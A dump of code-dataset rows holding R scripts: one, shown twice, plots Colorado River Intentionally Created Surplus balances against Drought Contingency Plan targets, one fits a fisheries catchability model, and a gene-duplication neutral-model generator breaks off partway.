# Updated June 10, 2021 to include 2020 data.
#
# David E. Rosenberg
# June 6, 2021
#
# Utah State University
# david.rosenberg@usu.edu
rm(list = ls()) #Clear history
# Load required libraies
if (!require(tidyverse)) {
install.packages("tidyverse", repos="https://cran.cnr.berkeley.edu/", verbose = TRUE)
library(tidyverse)
}
if (!require(readxl)) {
install.packages("readxl", repos="http://cran.r-project.org")
library(readxl)
}
if (!require(RColorBrewer)) {
install.packages("RColorBrewer",repos="http://cran.r-project.org")
library(RColorBrewer) #
}
if (!require(dplyr)) {
install.packages("dplyr",repos="http://cran.r-project.org")
library(dplyr) #
}
if (!require(expss)) {
install.packages("expss",repos="http://cran.r-project.org")
library(expss) #
}
if (!require(reshape2)) {
install.packages("reshape2", repos="http://cran.r-project.org")
library(reshape2)
}
if (!require(pracma)) {
install.packages("pracma", repos="http://cran.r-project.org")
library(pracma)
}
if (!require(lubridate)) {
install.packages("lubridate", repos="http://cran.r-project.org")
library(lubridate)
}
if (!require(directlabels)) {
install.packages("directlabels", repo="http://cran.r-project.org")
library(directlabels)
}
if (!require(plyr)) {
install.packages("plyr", repo="http://cran.r-project.org")
library(plyr)
}
if (!require(ggplot)) {
install.packages("ggPlot", repo="http://cran.r-project.org", dependencies = T)
library(ggplot)
}
if (!require(stringr)) {
install.packages("stringr", repo="http://cran.r-project.org")
library(stringr)
}
# Load Data
# Read in state balances each year
sExcelFile <- 'IntentionallyCreatedSurplus-Summary.xlsx'
dfICSBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "B6:G17")
dfICStoDCP <- read_excel(sExcelFile, sheet = "ICStoDCP", range = "A2:M14")
dfLimits <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#Read in max balance
nMaxBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#create a data frame
#dfMaxBalance <- data.frame(Year=dfICSBalance$Year, MaxBal = nMaxBalance$Total[2])
#Read in max deposit per year
dfMaxAnnualAmounts <- data.frame(Year=dfICSBalance$Year, MaxDeposit = nMaxBalance$Total[1], MaxWithdraw = nMaxBalance$Total[3])
cColNames <- colnames(dfICSBalance)
#Melt the data so state columns become a variable
dfICSBalanceMelt <- melt(data = dfICSBalance,id.vars = "Year", measure.vars = cColNames[1:4])
#Calculate the Current ICS balance as a fraction of current Mead Storage
# Data from: https://www.usbr.gov/lc/region/g4000/hourly/levels.html
nCurrMeadStorage <- 9934*1000 # May 1, 2021
nCurrICSTotal <- dfICSBalanceMelt %>% filter(Year == 2019) %>% summarise(Total = sum(value))
# #Lake Powell Unregulated inflow. Data from https://www.usbr.gov/uc/water/crsp/studies/images/PowellForecast.png
# dfLakePowellNatural <- data.frame (Year = seq(2011,2020,by=1), LakePowellFlow = c(16, 5, 5, 10.3, 10.1, 9.7, 12, 5, 13, 5.9))
#
# # Read in Paria flows each year
# sExcelFile <- 'Paria10yearFlow.xlsx'
# dfParia <- read_excel(sExcelFile, sheet = "Sheet1", range = "N36:P58")
#
# #Join the Lake Powell Natural and Paria data frames by year
# dfLeeFerryNatural <- left_join(dfLakePowellNatural,dfParia,by = c("Year" = "Water Year"))
#
# dfLeeFerryNatural$LeeFerryFlow <- dfLeeFerryNatural$LakePowellFlow + dfLeeFerryNatural$`Flow (acre-feet)`/1e6
print("ICS balance as fraction of Mead storage")
print(sprintf("%.1f%%",nCurrICSTotal$Total/nCurrMeadStorage*100))
print("Percent of Upper Colorado River Basin area of entire continential US area")
print(sprintf("%.1f%%",109800/3119884*100))
# print("Lake Powell Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LakePowellFlow)))
#
# print("Paria flow 2011 to 2020 (maf per year)")
# print(sprintf("%.3f", mean(dfLeeFerryNatural$`Flow (acre-feet)`/1e6)))
#
# print("Lee Ferry Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LeeFerryFlow)))
palBlues <- brewer.pal(9, "Blues")
#Plot #1. Stacked bar chart of account balance by state by year. Add individual state limits as secondary y axis
# Prepare state limits as a cumulative amount
cColNamesLimits <- colnames(dfLimits)
dfLimitsMelt <- melt(data=dfLimits, id.vars="New levels with DCP", measure.vars = cColNamesLimits[2:5])
dfMaxBalanceCum = dfLimitsMelt %>% filter(`New levels with DCP` == "Max Balance (AF)", variable != 'Total')
#Reorder so Arizona is on top
dfMaxBalanceCum$Order <- c(3,2,1)
dfMaxBalanceCum <- dfMaxBalanceCum[order(dfMaxBalanceCum$Order),]
#Calculate the cumulative total
dfMaxBalanceCum$CumVal <- cumsum(dfMaxBalanceCum$value)
#Replace the Arizona label
dfMaxBalanceCum$StateAsChar <- as.character(dfMaxBalanceCum$variable)
dfMaxBalanceCum$StateAsChar[3] <- "Total/Arizona"
ggplot() +
geom_bar(data=dfICSBalanceMelt %>% filter(variable != "Mexico"), aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_hline(yintercept = nMaxBalance$Total[2]/1e6, size = 2) +
#geom_line(data=dfMaxBalance, aes(color="Max Balance", y=MaxBal/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black")) +
scale_x_continuous(breaks=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2),labels=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2)) +
#Secondary scale with total max balance
#scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[2])/1e6, labels = c("Max Balance"))) +
#Secondary scale with individual state max balances
scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "Maximum Balance", breaks = dfMaxBalanceCum$CumVal/1e6, labels = dfMaxBalanceCum$StateAsChar)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color=FALSE) +
theme_bw() +
labs(x="", y="Intentionally Created Surplus\nAccount Balance\n(MAF)") +
theme(text = element_text(size=20), legend.title = element_blank(),
legend.text=element_text(size=18),
legend.position= c(0.1,0.80))
#Plot #2. Stacked bar chart of deposits to ICS accounts by state by year
#Calcualte deposits each year the differences by year
dfICSDeposit <- data.frame(-diff(as.matrix(dfICSBalance)))
#Put the correct year back in
dfICSDeposit$Year <- dfICSBalance$Year[1:nrow(dfICSDeposit)]
#Melt the data so state columns become a variable
dfICSDepositMelt <- melt(data = dfICSDeposit,id.vars = "Year", measure.vars = cColNames[1:3])
ggplot() +
geom_bar(data=dfICSDepositMelt, aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_line(data=dfMaxAnnualAmounts, aes(y=MaxDeposit/1e6,x=Year), size=2) +
geom_line(data=dfMaxAnnualAmounts, aes(color="Max Withdrawal", y=-MaxWithdraw/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black","Black")) +
scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[1],-nMaxBalance$Total[3])/1e6, labels = c("Max Deposit","Max Withdraw"))) +
#scale_x_continuous(breaks = c(0,5,10,15,20,25),labels=c(0,5,10,15, 20,25), limits = c(0,as.numeric(dfMaxStor %>% filter(Reservoir %in% c("Mead")) %>% select(Volume))),
# sec.axis = sec_axis(~. +0, name = "Mead Level (feet)", breaks = dfMeadPoolsPlot$stor_maf, labels = dfMeadPoolsPlot$label)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Deposit to Intentionally Created Surplus Account\n(MAF per year)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
# Plot Years ICS balance can fund DCP target
# Ratio of ICS balance to DCP target (Years)
dfICStoDCP$ElevationText <- paste(dfICStoDCP$`Mead Elevation (ft)`, "feet")
cColNamesICStoDCP <- colnames(dfICStoDCP)
dfICStoDCPMelt <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[5:7])
ggplot(data=dfICStoDCPMelt %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[5:7], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Years 2019 ICS balance can fund\nDCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max withdrawal to DCP target
dfICStoDCPMeltMaxWithdrawal <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[8:10])
ggplot(data=dfICStoDCPMeltMaxWithdrawal %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[8:10], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max withdrawal\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max deposit to DCP target
dfICStoDCPMeltMaxDeposit <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[11:13])
ggplot(data=dfICStoDCPMeltMaxDeposit %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[11:13], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max deposit\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of largest ICS deposit on record to DCP target
# Get the maximum historical ICS contributions
dfICSMaxDeposit <- dfICSDeposit %>% summarize(maxAZ = max(Arizona), maxCA = max(California), maxNV = max(Nevada))
# Get the DCP contributions for 1045 and 1025 feet
dfDCPcontribute <- dfICStoDCP %>% filter(`Mead Elevation (ft)` == 1045 | `Mead Elevation (ft)` == 1025 )
#Join the two data frames
dfICStoDCPRatio <- dfDCPcontribute
dfICStoDCPRatio$ICSAZ <- dfICSMaxDeposit$maxAZ
dfICStoDCPRatio$ICSCA <- dfICSMaxDeposit$maxCA
dfICStoDCPRatio$ICSNV <- dfICSMaxDeposit$maxNV
dfICStoDCPRatio$AZratio <- dfICStoDCPRatio$ICSAZ / dfICStoDCPRatio$`DCP-AZ Reduction (ac-ft)`
dfICStoDCPRatio$CAratio <- dfICStoDCPRatio$ICSCA / dfICStoDCPRatio$`DCP-CA Reduction (ac-ft)`
dfICStoDCPRatio$NVratio <- dfICStoDCPRatio$ICSNV / dfICStoDCPRatio$`DCP-NV Reduction (ac-ft)`
dfICStoDCPRatio$ElevationText <- paste(dfICStoDCPRatio$`Mead Elevation (ft)`," feet")
cNamesRatio <- colnames(dfICStoDCPRatio)
dfICStoDCPRatioMelt <- melt(data = dfICStoDCPRatio,id.vars = "ElevationText", measure.vars = cNamesRatio[18:20])
ggplot(data=dfICStoDCPRatioMelt ) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cNamesRatio[18:20], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Conservation Capacity\n(ratio of largest ICS deposit to DCP contribution)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
| /ICS/.Rproj.user/873C41F6/sources/per/t/F7BBD64C-contents | permissive | dzeke/ColoradoRiverFutures | R | false | false | 14,345 | # ICS-Plots.r
#
# Make stacked bar graph of state Intentionally Created Surplus holdings by year
#
# Data is USBR Water Accounting Reports: https://www.usbr.gov/lc/region/g4000/wtracct.html in source Excel file
# Please report bugs/feedback to:
#
# Updated June 23, 2020 to include annual deposits and withdraws as year-to-year differnces
#
# Updated April 4, 2021 to look at ICS to DCP conversion
# Updated June 10, 2021 to include 2020 data.
#
# David E. Rosenberg
# June 6, 2021
#
# Utah State University
# david.rosenberg@usu.edu
rm(list = ls()) #Clear history
# Load required libraies
if (!require(tidyverse)) {
install.packages("tidyverse", repos="https://cran.cnr.berkeley.edu/", verbose = TRUE)
library(tidyverse)
}
if (!require(readxl)) {
install.packages("readxl", repos="http://cran.r-project.org")
library(readxl)
}
if (!require(RColorBrewer)) {
install.packages("RColorBrewer",repos="http://cran.r-project.org")
library(RColorBrewer) #
}
if (!require(dplyr)) {
install.packages("dplyr",repos="http://cran.r-project.org")
library(dplyr) #
}
if (!require(expss)) {
install.packages("expss",repos="http://cran.r-project.org")
library(expss) #
}
if (!require(reshape2)) {
install.packages("reshape2", repos="http://cran.r-project.org")
library(reshape2)
}
if (!require(pracma)) {
install.packages("pracma", repos="http://cran.r-project.org")
library(pracma)
}
if (!require(lubridate)) {
install.packages("lubridate", repos="http://cran.r-project.org")
library(lubridate)
}
if (!require(directlabels)) {
install.packages("directlabels", repo="http://cran.r-project.org")
library(directlabels)
}
if (!require(plyr)) {
install.packages("plyr", repo="http://cran.r-project.org")
library(plyr)
}
if (!require(ggplot)) {
install.packages("ggPlot", repo="http://cran.r-project.org", dependencies = T)
library(ggplot)
}
if (!require(stringr)) {
install.packages("stringr", repo="http://cran.r-project.org")
library(stringr)
}
# Load Data
# Read in state balances each year
sExcelFile <- 'IntentionallyCreatedSurplus-Summary.xlsx'
dfICSBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "B6:G17")
dfICStoDCP <- read_excel(sExcelFile, sheet = "ICStoDCP", range = "A2:M14")
dfLimits <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#Read in max balance
nMaxBalance <- read_excel(sExcelFile, sheet = "Sheet1", range = "A23:F26")
#create a data frame
#dfMaxBalance <- data.frame(Year=dfICSBalance$Year, MaxBal = nMaxBalance$Total[2])
#Read in max deposit per year
dfMaxAnnualAmounts <- data.frame(Year=dfICSBalance$Year, MaxDeposit = nMaxBalance$Total[1], MaxWithdraw = nMaxBalance$Total[3])
cColNames <- colnames(dfICSBalance)
#Melt the data so state columns become a variable
dfICSBalanceMelt <- melt(data = dfICSBalance,id.vars = "Year", measure.vars = cColNames[1:4])
#Calculate the Current ICS balance as a fraction of current Mead Storage
# Data from: https://www.usbr.gov/lc/region/g4000/hourly/levels.html
nCurrMeadStorage <- 9934*1000 # May 1, 2021
nCurrICSTotal <- dfICSBalanceMelt %>% filter(Year == 2019) %>% summarise(Total = sum(value))
# #Lake Powell Unregulated inflow. Data from https://www.usbr.gov/uc/water/crsp/studies/images/PowellForecast.png
# dfLakePowellNatural <- data.frame (Year = seq(2011,2020,by=1), LakePowellFlow = c(16, 5, 5, 10.3, 10.1, 9.7, 12, 5, 13, 5.9))
#
# # Read in Paria flows each year
# sExcelFile <- 'Paria10yearFlow.xlsx'
# dfParia <- read_excel(sExcelFile, sheet = "Sheet1", range = "N36:P58")
#
# #Join the Lake Powell Natural and Paria data frames by year
# dfLeeFerryNatural <- left_join(dfLakePowellNatural,dfParia,by = c("Year" = "Water Year"))
#
# dfLeeFerryNatural$LeeFerryFlow <- dfLeeFerryNatural$LakePowellFlow + dfLeeFerryNatural$`Flow (acre-feet)`/1e6
print("ICS balance as fraction of Mead storage")
print(sprintf("%.1f%%",nCurrICSTotal$Total/nCurrMeadStorage*100))
print("Percent of Upper Colorado River Basin area of entire continential US area")
print(sprintf("%.1f%%",109800/3119884*100))
# print("Lake Powell Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LakePowellFlow)))
#
# print("Paria flow 2011 to 2020 (maf per year)")
# print(sprintf("%.3f", mean(dfLeeFerryNatural$`Flow (acre-feet)`/1e6)))
#
# print("Lee Ferry Natural Flow 2011 to 2020 (maf per year)")
# print(sprintf("%.1f", mean(dfLeeFerryNatural$LeeFerryFlow)))
palBlues <- brewer.pal(9, "Blues")
#Plot #1. Stacked bar chart of account balance by state by year. Add individual state limits as secondary y axis
# Prepare state limits as a cumulative amount
cColNamesLimits <- colnames(dfLimits)
dfLimitsMelt <- melt(data=dfLimits, id.vars="New levels with DCP", measure.vars = cColNamesLimits[2:5])
dfMaxBalanceCum = dfLimitsMelt %>% filter(`New levels with DCP` == "Max Balance (AF)", variable != 'Total')
#Reorder so Arizona is on top
dfMaxBalanceCum$Order <- c(3,2,1)
dfMaxBalanceCum <- dfMaxBalanceCum[order(dfMaxBalanceCum$Order),]
#Calculate the cumulative total
dfMaxBalanceCum$CumVal <- cumsum(dfMaxBalanceCum$value)
#Replace the Arizona label
dfMaxBalanceCum$StateAsChar <- as.character(dfMaxBalanceCum$variable)
dfMaxBalanceCum$StateAsChar[3] <- "Total/Arizona"
ggplot() +
geom_bar(data=dfICSBalanceMelt %>% filter(variable != "Mexico"), aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_hline(yintercept = nMaxBalance$Total[2]/1e6, size = 2) +
#geom_line(data=dfMaxBalance, aes(color="Max Balance", y=MaxBal/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black")) +
scale_x_continuous(breaks=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2),labels=seq(min(dfICSBalanceMelt$Year),max(dfICSBalanceMelt$Year),by=2)) +
#Secondary scale with total max balance
#scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[2])/1e6, labels = c("Max Balance"))) +
#Secondary scale with individual state max balances
scale_y_continuous(breaks=seq(0,3,by=1),labels=seq(0,3,by=1), sec.axis = sec_axis(~. +0, name = "Maximum Balance", breaks = dfMaxBalanceCum$CumVal/1e6, labels = dfMaxBalanceCum$StateAsChar)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color=FALSE) +
theme_bw() +
labs(x="", y="Intentionally Created Surplus\nAccount Balance\n(MAF)") +
theme(text = element_text(size=20), legend.title = element_blank(),
legend.text=element_text(size=18),
legend.position= c(0.1,0.80))
#Plot #2. Stacked bar chart of deposits to ICS accounts by state by year
#Calcualte deposits each year the differences by year
dfICSDeposit <- data.frame(-diff(as.matrix(dfICSBalance)))
#Put the correct year back in
dfICSDeposit$Year <- dfICSBalance$Year[1:nrow(dfICSDeposit)]
#Melt the data so state columns become a variable
dfICSDepositMelt <- melt(data = dfICSDeposit,id.vars = "Year", measure.vars = cColNames[1:3])
ggplot() +
geom_bar(data=dfICSDepositMelt, aes(fill=variable,y=value/1e6,x=Year),position="stack", stat="identity") +
geom_line(data=dfMaxAnnualAmounts, aes(y=MaxDeposit/1e6,x=Year), size=2) +
geom_line(data=dfMaxAnnualAmounts, aes(color="Max Withdrawal", y=-MaxWithdraw/1e6,x=Year), size=2) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNames[1:3]) +
scale_color_manual(name="Guide2", values=c("Black","Black")) +
scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(sec.axis = sec_axis(~. +0, name = "", breaks = c(nMaxBalance$Total[1],-nMaxBalance$Total[3])/1e6, labels = c("Max Deposit","Max Withdraw"))) +
#scale_x_continuous(breaks = c(0,5,10,15,20,25),labels=c(0,5,10,15, 20,25), limits = c(0,as.numeric(dfMaxStor %>% filter(Reservoir %in% c("Mead")) %>% select(Volume))),
# sec.axis = sec_axis(~. +0, name = "Mead Level (feet)", breaks = dfMeadPoolsPlot$stor_maf, labels = dfMeadPoolsPlot$label)) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Deposit to Intentionally Created Surplus Account\n(MAF per year)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
# Plot Years ICS balance can fund DCP target
# Ratio of ICS balance to DCP target (Years)
dfICStoDCP$ElevationText <- paste(dfICStoDCP$`Mead Elevation (ft)`, "feet")
cColNamesICStoDCP <- colnames(dfICStoDCP)
dfICStoDCPMelt <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[5:7])
ggplot(data=dfICStoDCPMelt %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[5:7], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Years 2019 ICS balance can fund\nDCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max withdrawal to DCP target
dfICStoDCPMeltMaxWithdrawal <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[8:10])
ggplot(data=dfICStoDCPMeltMaxWithdrawal %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[8:10], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max withdrawal\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max deposit to DCP target
dfICStoDCPMeltMaxDeposit <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[11:13])
ggplot(data=dfICStoDCPMeltMaxDeposit %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[11:13], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max deposit\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of largest ICS deposit on record to DCP target
# Get the maximum historical ICS contributions
dfICSMaxDeposit <- dfICSDeposit %>% summarize(maxAZ = max(Arizona), maxCA = max(California), maxNV = max(Nevada))
# Get the DCP contributions for 1045 and 1025 feet
dfDCPcontribute <- dfICStoDCP %>% filter(`Mead Elevation (ft)` == 1045 | `Mead Elevation (ft)` == 1025 )
#Join the two data frames
dfICStoDCPRatio <- dfDCPcontribute
dfICStoDCPRatio$ICSAZ <- dfICSMaxDeposit$maxAZ
dfICStoDCPRatio$ICSCA <- dfICSMaxDeposit$maxCA
dfICStoDCPRatio$ICSNV <- dfICSMaxDeposit$maxNV
dfICStoDCPRatio$AZratio <- dfICStoDCPRatio$ICSAZ / dfICStoDCPRatio$`DCP-AZ Reduction (ac-ft)`
dfICStoDCPRatio$CAratio <- dfICStoDCPRatio$ICSCA / dfICStoDCPRatio$`DCP-CA Reduction (ac-ft)`
dfICStoDCPRatio$NVratio <- dfICStoDCPRatio$ICSNV / dfICStoDCPRatio$`DCP-NV Reduction (ac-ft)`
dfICStoDCPRatio$ElevationText <- paste(dfICStoDCPRatio$`Mead Elevation (ft)`," feet")
cNamesRatio <- colnames(dfICStoDCPRatio)
dfICStoDCPRatioMelt <- melt(data = dfICStoDCPRatio,id.vars = "ElevationText", measure.vars = cNamesRatio[18:20])
ggplot(data=dfICStoDCPRatioMelt ) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cNamesRatio[18:20], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Conservation Capacity\n(ratio of largest ICS deposit to DCP contribution)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
| |
EstimateMandQ <- function(catch, effort, catchability.scaling.factor){
result <- optim(par = c(10,1), fn = llfunc2, catch = catch, effort = effort, catchability.scaling.factor = catchability.scaling.factor
, hessian = TRUE)
ifelse(result$convergence == 0, return(result), {print("Convergence failed"); return(1)})
}
| /Scripts/Obsolete/EstimateMandQ.R | no_license | mkienzle/SurvivalAnalysisForFisheries | R | false | false | 324 | r | EstimateMandQ <- function(catch, effort, catchability.scaling.factor){
result <- optim(par = c(10,1), fn = llfunc2, catch = catch, effort = effort, catchability.scaling.factor = catchability.scaling.factor
, hessian = TRUE)
ifelse(result$convergence == 0, return(result), {print("Convergence failed"); return(1)})
}
|
# Build and Reload Package: 'Ctrl + Shift + B'
# Check Package: 'Ctrl + Shift + E'
# Test Package: 'Ctrl + Shift + T'
#' Neutral model generator
#'
#' This function creates the infinitesimal generator for the model
#'
#'
#' @param N population size
#' @param up Poisson rate of pseudogenization
#' @keywords phylogeny, CNV, neutral model
#' @export
#' @examples
#' Genedupdip_neutralgenerator(N, up)
Genedupdip_neutralgenerator <- function(N,up){
#Generator for the model without neofunctionalization
Pos <- matrix(0, ncol=N+1, nrow=N+1)
count <- 0
#Create indexing matrix Pos such that Q(Pos(i,j),:) is row of Q
#corresponding to state (i,j), etc.
for (i in 1:(N+1)){
for (j in 1:(N+2-i)){
#if ~(i==1 && j ==1) #&& ~(i== 1 && j == N+1)
count <- count + 1
Pos[i,j] <- count
}
}
# Evaluate number of non-zero entries of Q
